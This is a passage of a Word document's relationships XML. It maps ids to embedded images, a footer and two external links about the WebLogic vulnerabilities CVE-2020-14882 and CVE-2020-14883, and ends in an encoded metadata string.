Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/murataydemir/CVE-2020-14883" TargetMode="External"/><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3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 Id="rId2"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38.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NA4DpIZFE+zlANDFsXNjsJtAQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnJia3hhajJwMzk0bjIOaC42OWZ3ZnN1OHNicmoyDmguNHE1cmRiNW55bGt5Mg5oLjZteG41cTg4bzFjZzIOaC51cjRleGxubnFtYXgyDmguMm1hNXZxMW00NDN3Mg5oLnoxZ2Y4a2c0N2YxdzIOaC4zcDE0cmV4ejVvem4yDmgucXA3MmFrdnFtZzBrMg5oLnNtbXo4aHNzbzF4NTIOaC55Z3o2MWJka3NjMGcyDmgubTh4cWdoZjhkdHh6Mg5oLjE3NWY1Y3M5NHowbzgAciExZEV3T3o2Ykt2OWVNS3dwWTB0ZlZsVFB1S3pVMGFiM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